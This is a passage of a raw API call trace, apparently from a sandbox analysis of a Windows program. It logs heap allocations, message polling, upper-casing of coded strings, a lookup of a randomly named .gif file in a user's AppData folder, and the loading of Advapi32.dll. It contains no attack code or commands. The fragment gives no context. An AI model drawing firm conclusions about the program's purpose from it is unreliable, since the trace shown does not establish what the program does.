Flags=0x0, Size=0x10) returned 0x24aa878 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.954] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.955] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0206.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/USOrj0U79kg56B_MZLC3.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e6aa90, ftCreationTime.dwHighDateTime=0x1d4cd39, ftLastAccessTime.dwLowDateTime=0xe61ff240, ftLastAccessTime.dwHighDateTime=0x1d4d3bd, ftLastWriteTime.dwLowDateTime=0xe61ff240, ftLastWriteTime.dwHighDateTime=0x1d4d3bd, nFileSizeHigh=0x0, nFileSizeLow=0x12283, dwReserved0=0xffb0039, dwReserved1=0x1aa3d, cFileName="USOrj0U79kg56B_MZLC3.gif", cAlternateFileName="USORJ0~1.GIF")) returned 0xaa5860 [0206.956] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.956] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0206.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.958] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.958] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.959] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.959] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.959] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.960] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.960] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.960] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.961] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.961] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.964] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.964] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.964] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0206.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.966] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0206.966] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0206.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: 